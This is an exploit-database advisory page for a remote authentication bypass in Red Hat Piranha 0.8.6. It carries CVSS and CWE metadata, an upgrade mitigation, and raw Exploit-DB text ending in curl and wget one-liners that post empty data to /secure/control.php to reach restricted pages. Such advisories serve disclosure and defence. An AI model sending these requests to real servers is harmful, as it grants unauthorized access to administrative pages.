header-logo
Suggest Exploit
vendor:
Piranha
by:
SecurityFocus
7,5
CVSS
HIGH
Security Bypass
287
CWE
Product Name: Piranha
Affected Version From: 0.8.6
Affected Version To: 0.8.6
Patch Exists: YES
Related CWE: N/A
CPE: a:redhat:piranha
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Red Hat Piranha Remote Security Bypass Vulnerability

Red Hat Piranha is prone to a remote security bypass vulnerability. An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, this may lead to further attacks. The attacker can use curl or wget to exploit this vulnerability.

Mitigation:

Upgrade to the latest version of Red Hat Piranha
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/65587/info

Red Hat Piranha is prone to a remote security bypass vulnerability.

An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, this may lead to further attacks.

Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected. 

curl -d'' -I http://www.example.com:3636/secure/control.php 
wget -qO- --post-data='' http://www.example.com3636/secure/control.php